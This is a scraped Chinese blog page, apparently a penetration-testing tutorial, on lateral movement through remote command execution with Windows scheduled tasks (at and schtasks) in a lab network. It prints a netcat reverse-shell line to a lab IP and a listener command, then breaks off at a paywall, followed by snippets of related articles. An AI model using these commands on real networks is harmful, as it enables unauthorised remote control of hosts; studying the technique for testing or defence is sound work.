横向远程命令执行——Windows计划任务

最新推荐文章于 2024-04-08 17:42:57 发布
最新推荐文章于 2024-04-08 17:42:57 发布
阅读量2.3k 收藏 5
点赞数
分类专栏: 内网渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SheXinK/article/details/103757177
版权
本文介绍了在安全测试中,如何利用Windows系统的at和schtasks命令进行远程命令执行。通过建立IPC$连接,可以在目标系统上创建计划任务,实现横向渗透。在Win7和Server2008环境下,利用nc反弹shell,展示了at命令和schtasks命令的不同用法,后者提供更灵活的参数设置和即时执行功能。完成测试后,别忘了删除创建的计划任务。
摘要由CSDN通过智能技术生成

横向远程命令执行——Windows计划任务


  Windows任务计划程序可以让计算机按照我们的要求在指定时间执行指定的程序,并且可以设置时间间隔重复执行。利用“任务计划”,可以将任何脚本、程序或文档安排在某个最方便的时间运行。

1、 测试环境

  Win7:192.168.11.137
  Server2008:192.168.11.200
  在通过nmap扫描发现内网中存在开放139,445端口存活主机,当我们拿到一个管理员账户时,可通过 atschtasks进行创建任务计划程序进行横向渗透。
在这里插入图片描述
  在演示环境中,为了方便演示,在服务器配置了nc,并在C盘创建了c.bat写入命令 nc 192.168.11.137 4444 -e cmd.exe ,通过nc反弹给攻击机一个交互式的shell。使用 nc -lvp [port] 在攻击机监听4444端口:
在这里插入图片描述

2、 计划任务利用

2.1 at命令

  at命令远程创建计划任务需先建立IPC$连接,否则在执行时会返回拒绝访问。Win8以后已不再支持at命令,使用schtasks替代。

net use \
最低0.47元/天 解锁文章
SheXinK
关注
专栏目录
【神兵利器】——180、MSF基本介绍
Fly_鹏程万里
10-16 47
Metasploit最初是由HD Moore所开发和孕育的,当时HD只是一个安全公司的雇员,当他意识到他的绝大多数时间是在用来验证和处理那些公开发布的渗透代码时,他便开始为编写和开发渗透代码构建一个灵活且可维护的框架平台,2003年10月他发布了他的第一个基于Perl语言的Metasploit版本,当时一共集成了11个渗透攻击模块,随后在2009年的秋季Metasploit被漏洞扫描领域的一家领军企业Rapid7公司收购,Rapid7公司允许HD来招募一支团队专注于Metasploit框架的开发,自从被收购
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1528
内网环境下的横向移动总结
Windows远程执行
最新发布
yyh_linux_note的博客
04-08 1374
本文分享的一些远程执行示例,目的是为了提高用户的安全防范意识以及从安全的角度去考虑如何监控或阻止一些人的恶意手段,大家一定要用在正确的用途上
远程执行windows上的计划任务
weixin_33998125的博客
11-17 3653
结束计划任务:schtasks /end /tn "计划任务的名字" /s "机器名或IP" /u "用户名" /p "密码"启动计划任务:schtasks /run /tn "计划任务的名字" /s "机器名或IP"/u "用户名" /p "密码" 转载于:https://blog.51cto.com/youkanzhao/1577332...
远程服务器任务,远程大批量操作windows服务器的计划任务
weixin_29638987的博客
07-30 507
在工作过程中,经常需要大批量对某一批次机器进行计划任务设置,可以通过组策略实现,也可以通过脚本操作。本文演示如何通过powershell脚本远程大批量给若干台机器设置周期重启的操作。#生成10到30的数组$a=(10..30);#初始化空的数组$pcname=@();#给数组赋值$a | %{$pc = "shoa"+ $_; $pcname += "$pc"; };$pcname | %{$co...
远程计划任务管理
dingshun129的博客
09-13 289
目录 一、程序和进程的关系 1、程序 2、进程 3、线程 二、查看进程信息 1、PS 2、长格式显示进程 三、查看进程信息 1、pgrep 2、pstree 四、进程的启动方式 1、手动启动 2、调度启动 五、进程的前后台调度 1、Ctrl+Z组合键 2、jobs命令 3、fg命令 六、终止进程的运行 1、Ctrl+C 2、kill、killall命令 3、pkill 七:计划任务管理 1、at命令 2、crontab命令 3、crontab任务配置的格式.
横向远程命令执行——Windows服务
SheXinK’s Blog
12-30 1197
横向远程命令执行——SC1、 测试环境2、 Windows服务利用2.1 sc   SC命令是用于与服务控制管理器和服务进行通信的命令行程序。SC命令可以设置存储在注册表中的服务属性,以控制如何在启动时启动服务应用程序,以及如何将其作为后台程序运行。即更改服务的启动状态。 1、 测试环境   Win7:192.168.11.137   Server2008:192.168.11.200   在通过...
运维知识点-Windows操作系统-cmd/Dos批处理bat命令与脚本手册
aming小老弟
11-17 1812
注释输入和输出变量条件判断循环跳转函数DOS命令CurlTelnet添加账号并加入管理员组添加用户至远程桌面组允许修改密码关闭防火墙获取系统和版本信息显示本地或远程机器上当前运行的进程列表。操作系统 服务命令列表chkdsk.exe 磁盘检查开3389端口systeminfo获取NETBIOS主机名ping 测试网络连接net computer 添加或者删除域数据库中的计算机,telnet命令进行远程登陆使用ftp命令进行数据传输使用netstat命令查看网络连接的相关信息。
远程计划任务管理
weixin_30652897的博客
06-10 467
有时你需要远程管理或运行一批机器,但是按要求你没有权限或者不能安装客户端,下面的批处理可能帮上你的忙,将下方代码保存为批处理,并创建Clients.txt,存放的是以回车分隔的IP @echo off setlocal enabledelayedexpansion Set UP=/U username /P password Set RUN=/run Set DISABLE=/C...
远程推送脚本,创建任务计划
weixin_33916256的博客
10-21 146
    1 #############################脚本功能及说明####################################### 2 #该脚本用来在各台服务器上运行创建任务计划,可以将位于本地的脚本拷贝到远程服务器 3 #通过查看Task_Result.txt文件可以查看任务计划的创建结果,如果任务计划创建失败,控制台会有输出 4 #...
SSH 远程执行任务与服务器
DqClojure的博客
09-25 125
在网络管理和系统管理中,SSH(Secure Shell)是一种常用的协议,用于远程登录和执行命令。通过SSH,您可以安全远程访问服务器,并在远程执行任务。总结而言,通过SSH远程执行任务与服务器是一种安全而高效的方式。通过简单的命令行操作,您可以在远程服务器上轻松执行各种任务。请注意,这只是一些基本示例,您可以根据自己的需求执行各种任务。在实际应用中,可能需要使用更复杂的脚本或命令,以及其他SSH选项和参数。是您希望将脚本文件复制到的服务器上的目标路径。一旦成功连接到服务器,您就可以执行各种任务。
2.5计划任务远程管理
l10711097061的博客
11-21 401
基于 HTML 5 和 JavaScript 的 VNC 查看器。手工部署koko (coco 目前已经被 koko 取代)与nginx结合支持Web Terminal前端。2、部署并使用jumpserver服务器。支持终端管理,默认port为2222。使用计划任务运行指定应用程序。9、部署guacamole。1、使用ssh管理远程机器。设置用户访问的URL。
如何让计划任务执行时显示CMD窗口
wuxinji的博客
09-02 1万+
公司用计划任务调用bat文件进行回归测试。今天修改了一下配置,结果运行时看不见黑框cmd窗口了,非常不利于查错。 经过公司前辈的指点发现了问题。 在计划任务中右键单击一个任务,点击Export(导出)。在导出的XML中有如下一行: Password 在命令行中输入 schtasks /change /it /tn "TASK1" 再次导出XML文件,LogonType变为:
windows命令行添加任务计划
Jepson的博客
11-01 8048
windows系统中,可通过命令创建任务计划,用到 schtasks 命令 Schtasks命令详解 安排命令和程序定期运行或在指定时间内运行。从计划表中添加和删除任务,按需要启动和停止任务,显示和更改计划任务。 语法 schtasks/create /tn TaskName /tr TaskRun /sc schedule [/mo modifier ] [/d day][/m month[,month...][/i IdleTime][/st StartTime] [/sd StartDate][/e
Windows使用任务计划程序执行定时任务,开机自启任务,登录自启任务
热门推荐
Mr青青子衿
01-10 3万+
控制面板里面有很多实用的功能,我这里介绍一下怎么进入控制面板详细界面并配置任务计划程序
at命令无法启动远程计算机程序,命令行“任务计划管理器”之At命令
weixin_35599418的博客
07-05 806
AT是Windows 2000/XP中增强的命令行“任务计划管理器”,使用AT命令能够使指定的命令或程序在特定的日期或时间运行。它相对于Windows中的“任务计划”功能更全、使用更灵活,用它甚至还可以管理远程计算机的计划任务。当使用IPC入侵时,可以使用AT命令来安排计划任务,让指定的程序在目标计算机中按指定的时间运行。实例1:查看是否运行计划任务并启动此服务要想使用AT命令,“Schedule...
Windows中使用命令创建计划任务(at、schtasks)
Hi~ 土拨鼠
12-21 1万+
文章目录at命令schtasks命令Windows中通常用at和schtasks命令添加计划任务,其中at命令默认是以System权限执行。 at命令 从Win8开始不再支持at命令,以下操作在win7中进行 若要使用 at 命令,任务计划程序服务必须正在运行。 使用 at 命令创建任务时,必须配置这些任务,以便它们在同一用户帐户中运行。 at命令语法: at [\\computername] time [/interactive] [/every:date[,...] | [/next:date[
windows定时运行exe文件
qq_43847263的博客
12-29 1万+
windows定时运行exe文件通过任务计划程序进行运行1、在cmd打开任务计划程序两种方法2、新建一个计划程序文件夹3、新建任务1、创建任务2、设置触发器3、设置操作4、其他的看情况进行设置通过cmd设置运行at命令以及无法使用了schtasks命令 通过任务计划程序进行运行 1、在cmd打开任务计划程序 两种方法 1、首先打开Windows系统的“开始”菜单,从中依次点选“程序”/“附件”/“系统工具”/“任务计划程序”命令。 2、直接搜索任务计划程序 2、新建一个计划程序文件夹 3、新建任务 1、创
Windows计划任务横向移动技术详解
在 XP/2003 以及更低版本的 Windows 系统中,默认使用 at 命令来管理本地或远程机器上的计划任务。下面我们将演示如何使用 at 命令来进行横向移动。 首先,需要准备好相对应的监听器和 payload,例如使用 Cobalt...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值